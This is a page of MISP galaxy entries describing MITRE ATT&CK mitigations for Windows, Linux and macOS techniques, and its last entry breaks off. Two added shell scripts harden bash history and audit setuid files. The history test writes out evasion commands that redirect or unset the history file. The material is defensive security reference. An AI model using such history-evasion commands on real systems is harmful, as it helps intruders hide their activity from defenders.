Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Registry Mitigation - T1214"

Credentials in Registry Mitigation - T1214 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

Table 6534. Table References

Links

https://attack.mitre.org/mitigations/T1214

System Time Discovery Mitigation - T1124

Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Time Discovery Mitigation - T1124"

System Time Discovery Mitigation - T1124 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 6535. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1124

https://technet.microsoft.com/en-us/library/ee791851.aspx

Browser Bookmark Discovery Mitigation - T1217

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Browser Bookmark Discovery Mitigation - T1217"

Browser Bookmark Discovery Mitigation - T1217 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 6536. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1217

https://technet.microsoft.com/en-us/library/ee791851.aspx

Netsh Helper DLL Mitigation - T1128

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)

The tag is: misp-galaxy:mitre-course-of-action="Netsh Helper DLL Mitigation - T1128"

Netsh Helper DLL Mitigation - T1128 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128" with estimative-language:likelihood-probability="almost-certain"

Table 6537. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1128

Remote Access Tools Mitigation - T1219

Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.

Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.

Use application whitelisting to mitigate use of and installation of unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Remote Access Tools Mitigation - T1219"

Remote Access Tools Mitigation - T1219 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 6538. Table References

Links

https://attack.mitre.org/mitigations/T1219

External Remote Services Mitigation - T1133

Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary’s ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.

The tag is: misp-galaxy:mitre-course-of-action="External Remote Services Mitigation - T1133"

External Remote Services Mitigation - T1133 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 6539. Table References

Links

https://attack.mitre.org/mitigations/T1133

Access Token Manipulation Mitigation - T1134

Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.

Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token. (Citation: Microsoft Replace Process Token)

Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.

The tag is: misp-galaxy:mitre-course-of-action="Access Token Manipulation Mitigation - T1134"

Access Token Manipulation Mitigation - T1134 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

Table 6540. Table References

Links

https://attack.mitre.org/mitigations/T1134

https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object

https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token

Network Share Discovery Mitigation - T1135

Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Discovery Mitigation - T1135"

Network Share Discovery Mitigation - T1135 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 6541. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1135

https://technet.microsoft.com/en-us/library/ee791851.aspx

Dynamic Data Exchange Mitigation - T1173

Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)

Ensure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)

The tag is: misp-galaxy:mitre-course-of-action="Dynamic Data Exchange Mitigation - T1173"

Dynamic Data Exchange Mitigation - T1173 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"

Table 6542. Table References

Links

https://attack.mitre.org/mitigations/T1173

https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction

https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

Clear Command History Mitigation - T1146

Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files. Additionally, making the shell's history variables readonly can make sure that the history is preserved (Citation: Securing bash history).
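The readonly-variable part of that mitigation, as an added example (not text or code from the MISP galaxy or from MITRE): a profile fragment that pins the bash history variables and a check, run in a throwaway bash, that the pinned session really rejects attempts to redirect, unset or shrink its history. The profile path, history sizes and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the MISP galaxy or MITRE text): make the bash history
# variables readonly so a session cannot silently shrink or redirect its history.
# File paths and sizes below are illustrative assumptions.

# Lines to place in a system-wide profile fragment (assumed path:
# /etc/profile.d/history-hardening.sh) so every login shell inherits them.
# A readonly variable cannot be changed or unset for the life of the shell.
HISTORY_HARDENING='
HISTFILE="$HOME/.bash_history"
HISTSIZE=100000
HISTFILESIZE=100000
HISTCONTROL=""
shopt -s histappend
readonly HISTFILE HISTSIZE HISTFILESIZE HISTCONTROL
'
# To also stop the history file itself from being truncated or deleted, root can
# mark it append-only on ext-family filesystems:  chattr +a "$HOME/.bash_history"

# history_vars_locked INIT: start a bash with INIT applied, then try to redirect,
# unset and shrink the history. Returns 0 only if every attempt is rejected.
history_vars_locked() {
    bash -c "$1
        (HISTFILE=/dev/null) 2>/dev/null && exit 1
        (unset HISTFILE)     2>/dev/null && exit 1
        (HISTSIZE=0)         2>/dev/null && exit 1
        exit 0"
}

# Demonstration: an unhardened shell accepts the changes, a hardened one does not.
if history_vars_locked ""; then
    echo "unexpected: bare shell rejected history changes"
fi
if history_vars_locked "$HISTORY_HARDENING"; then
    echo "history variables are locked"
fi
```

Note that this only protects the interactive shell's own bookkeeping; a user can still run a different shell or exec a program that never writes history, so the append-only file attribute and central log forwarding remain the stronger controls.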

The tag is: misp-galaxy:mitre-course-of-action="Clear Command History Mitigation - T1146"

Clear Command History Mitigation - T1146 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146" with estimative-language:likelihood-probability="almost-certain"

Table 6543. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

https://attack.mitre.org/mitigations/T1146

Password Filter DLL Mitigation - T1174

Ensure only valid password filters are registered. Filter DLLs must be present in the Windows installation directory (C:\Windows\System32\ by default) of a domain controller and/or local computer, with a corresponding entry in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages. (Citation: Microsoft Install Password Filter n.d)

The tag is: misp-galaxy:mitre-course-of-action="Password Filter DLL Mitigation - T1174"

Password Filter DLL Mitigation - T1174 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174" with estimative-language:likelihood-probability="almost-certain"

Table 6544. Table References

Links

https://attack.mitre.org/mitigations/T1174

https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx

Spearphishing via Service Mitigation - T1194

Determine if certain social media sites, personal webmail services, or other services that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.

Because this technique involves use of legitimate services and user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing via Service Mitigation - T1194"

Spearphishing via Service Mitigation - T1194 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"

Table 6545. Table References

Links

https://attack.mitre.org/mitigations/T1194

Supply Chain Compromise Mitigation - T1195

Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.

Leverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012):

  • Uniquely Identify Supply Chain Elements, Processes, and Actors

  • Limit Access and Exposure within the Supply Chain

  • Establish and Maintain the Provenance of Elements, Processes, Tools, and Data

  • Share Information within Strict Limits

  • Perform SCRM Awareness and Training

  • Use Defensive Design for Systems, Elements, and Processes

  • Perform Continuous Integrator Review

  • Strengthen Delivery Mechanisms

  • Assure Sustainment Activities and Processes

  • Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle

A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented. (Citation: OWASP Top 10 2017)

The tag is: misp-galaxy:mitre-course-of-action="Supply Chain Compromise Mitigation - T1195"

Supply Chain Compromise Mitigation - T1195 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 6546. Table References

Links

http://dx.doi.org/10.6028/NIST.IR.7622

https://attack.mitre.org/mitigations/T1195

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf

Setuid and Setgid Mitigation - T1166

Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.
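Minimising the setuid/setgid set starts with knowing what it is. The following is an added example (not code from the MISP galaxy or MITRE): it enumerates setuid and setgid files under a directory tree, compares them with an approved baseline, and reports anything outside it. The demo builds a constructed directory with mktemp; the baseline format (one path per line) and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the MISP galaxy or MITRE text): enumerate the setuid
# and setgid files under a directory tree and diff them against an approved
# baseline, so the privileged set can be reviewed and reduced. Paths are
# illustrative assumptions.

# list_suid_sgid DIR: print every regular file under DIR that carries the setuid
# (4000) or setgid (2000) bit, one path per line, sorted for stable diffs.
# -xdev keeps the scan on one filesystem so a system-wide audit does not wander
# into network or pseudo filesystems.
list_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# unexpected_suid DIR BASELINE: print the setuid/setgid files under DIR that are
# absent from BASELINE (one approved path per line). Returns 1 if any exist,
# 0 if the live set is fully covered by the baseline.
unexpected_suid() {
    _bad=$(list_suid_sgid "$1" | grep -vxF -f "$2" || true)
    if [ -n "$_bad" ]; then
        printf '%s\n' "$_bad"
        return 1
    fi
    return 0
}

# demo_unexpected_count: build a constructed tree with one setuid, one setgid
# and one plain file, approve only the setgid one, and report how many
# privileged files fall outside the baseline (expected: 1, the setuid file).
demo_unexpected_count() {
    _d=$(mktemp -d)
    : > "$_d/plain";   chmod 0755 "$_d/plain"
    : > "$_d/suidbin"; chmod 4755 "$_d/suidbin"
    : > "$_d/sgidbin"; chmod 2755 "$_d/sgidbin"
    printf '%s\n' "$_d/sgidbin" > "$_d/baseline.txt"
    _n=$(unexpected_suid "$_d" "$_d/baseline.txt" | wc -l | tr -d ' ')
    rm -rf "$_d"
    echo "$_n"
}
```

For a real audit, run list_suid_sgid / once, review each entry, store the approved list as the baseline, and schedule unexpected_suid so that a newly appeared privileged binary is flagged rather than silently joining the set.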

The tag is: misp-galaxy:mitre-course-of-action="Setuid and Setgid Mitigation - T1166"

Setuid and Setgid Mitigation - T1166 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166" with estimative-language:likelihood-probability="almost-certain"

Table 6547. Table References

Links

https://attack.mitre.org/mitigations/T1166

Local Job Scheduling Mitigation - T1168

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.

The tag is: misp-galaxy:mitre-course-of-action="Local Job Scheduling Mitigation - T1168"

Local Job Scheduling Mitigation - T1168 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Table 6548. Table References

Links

https://attack.mitre.org/mitigations/T1168

Control Panel Items Mitigation - T1196

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (e.g., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

Restrict storage and execution of Control Panel items to protected directories, such as C:\Windows, rather than user directories.

Index known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.

Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)

The tag is: misp-galaxy:mitre-course-of-action="Control Panel Items Mitigation - T1196"

Control Panel Items Mitigation - T1196 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"

Table 6549. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1196

https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx

Compiled HTML File Mitigation - T1223

Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Compiled HTML File Mitigation - T1223"

Table 6550. Table References

Links

https://attack.mitre.org/mitigations/T1223

https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913

Domain Trust Discovery Mitigation - T1482

Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)

The tag is: misp-galaxy:mitre-course-of-action="Domain Trust Discovery Mitigation - T1482"

Table 6551. Table References

Links

http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/

https://attack.mitre.org/mitigations/T1482

Stored Data Manipulation Mitigation - T1492

Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversary's ability to perform tailored data modifications. Where applicable, examine using file monitoring software to check the integrity of important files and directories, and take corrective action when unauthorized changes are detected.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Citation: Ready.gov IT DRP) Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and manipulate backups.

The tag is: misp-galaxy:mitre-course-of-action="Stored Data Manipulation Mitigation - T1492"

Table 6552. Table References

Links

https://attack.mitre.org/mitigations/T1492

https://www.ready.gov/business/implementation/IT

Domain Generation Algorithms Mitigation - T1483

This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Domain Generation Algorithms Mitigation - T1483"

Table 6553. Table References

Links

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1483

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/

Transmitted Data Manipulation Mitigation - T1493

Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.

The tag is: misp-galaxy:mitre-course-of-action="Transmitted Data Manipulation Mitigation - T1493"

Table 6554. Table References

Links

https://attack.mitre.org/mitigations/T1493

Runtime Data Manipulation Mitigation - T1494

Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Runtime Data Manipulation Mitigation - T1494"

Table 6555. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1494

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

LLMNR/NBT-NS Poisoning Mitigation - T1171

Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)

Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)

The tag is: misp-galaxy:mitre-course-of-action="LLMNR/NBT-NS Poisoning Mitigation - T1171"

LLMNR/NBT-NS Poisoning Mitigation - T1171 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"

Table 6556. Table References

Links

https://adsecurity.org/?p=3299

https://attack.mitre.org/mitigations/T1171

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)

Restrict Web-Based Content - M1021

Restrict use of certain websites, block downloads/attachments, block JavaScript, restrict browser extensions, etc.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Web-Based Content - M1021"

Table 6557. Table References

Links

https://attack.mitre.org/mitigations/M1021

Multi-Stage Channels Mitigation - T1104

Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multi-Stage Channels Mitigation - T1104"

Multi-Stage Channels Mitigation - T1104 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 6558. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1104

Third-party Software Mitigation - T1072

Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.

Grant access to third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.

Where the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Third-party Software Mitigation - T1072"

Third-party Software Mitigation - T1072 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 6559. Table References

Links

https://attack.mitre.org/mitigations/T1072

DLL Side-Loading Mitigation - T1073

Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.

The tag is: misp-galaxy:mitre-course-of-action="DLL Side-Loading Mitigation - T1073"

DLL Side-Loading Mitigation - T1073 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

Table 6560. Table References

Links

https://attack.mitre.org/mitigations/T1073

Re-opened Applications Mitigation - T1164

Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: defaults write -g ApplePersistence -bool no

The tag is: misp-galaxy:mitre-course-of-action="Re-opened Applications Mitigation - T1164"

Re-opened Applications Mitigation - T1164 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"

Table 6561. Table References

Links

https://attack.mitre.org/mitigations/T1164

https://support.apple.com/en-us/HT204005

SID-History Injection Mitigation - T1178

Clean up SID-History attributes after legitimate account migration is complete.

Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e. preventing the trusted domain from claiming a user has membership in groups outside of the domain).

SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) Note, however, that SID Filtering is not automatically applied to legacy trusts, or may have been deliberately disabled to allow inter-domain access to resources.

SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)

  • Disabling SIDHistory on forest trusts using the netdom tool (netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /EnableSIDHistory:no on the domain controller).

  • Applying SID Filter Quarantining to external trusts using the netdom tool (netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /quarantine:yes on the domain controller).

Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust.

The tag is: misp-galaxy:mitre-course-of-action="SID-History Injection Mitigation - T1178"

SID-History Injection Mitigation - T1178 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178" with estimative-language:likelihood-probability="almost-certain"

Table 6562. Table References

Links

https://adsecurity.org/?p=1640

https://attack.mitre.org/mitigations/T1178

https://technet.microsoft.com/library/cc755321.aspx

https://technet.microsoft.com/library/cc794757.aspx

https://technet.microsoft.com/library/cc835085.aspx

Multi-hop Proxy Mitigation - T1188

Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1172).

The tag is: misp-galaxy:mitre-course-of-action="Multi-hop Proxy Mitigation - T1188"

Multi-hop Proxy Mitigation - T1188 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 6563. Table References

Links

